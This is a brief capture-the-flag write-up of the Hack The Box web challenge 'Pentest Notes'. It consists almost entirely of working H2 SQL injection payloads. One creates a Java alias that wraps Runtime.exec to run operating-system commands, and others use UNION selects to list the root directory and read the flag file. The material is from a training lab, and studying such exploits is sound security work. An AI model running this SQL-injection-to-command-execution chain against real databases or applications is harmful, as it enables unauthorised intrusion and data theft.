Pentest Notes

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of the Pentest Notes challenge which is a web challenge from Hack The Box.

SQL query in NotesController.java is vulnerable to SQLI

Select * from notes where name ='%s'

Read flag with H2 SQLi

https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

$$ not allowed so replace with '

Create alias

SQL Injection'; CREATE ALIAS RUN as 'String e(String cmd) throws java.io.IOException{java.lang.Runtime rt= java.lang.Runtime.getRuntime();java.util.Scanner s = new java.util.Scanner(rt.exec(cmd).getInputStream());return s.nextLine();}'--

Get file name

From Dockerfile we know that the flag file has a random prefix

SQL Injection' union select null, null, RUN('ls /'); --

Read flag

SQL Injection' union select null, null, RUN('cat /JN8fe3XRqTYK_flag.txt'); --

web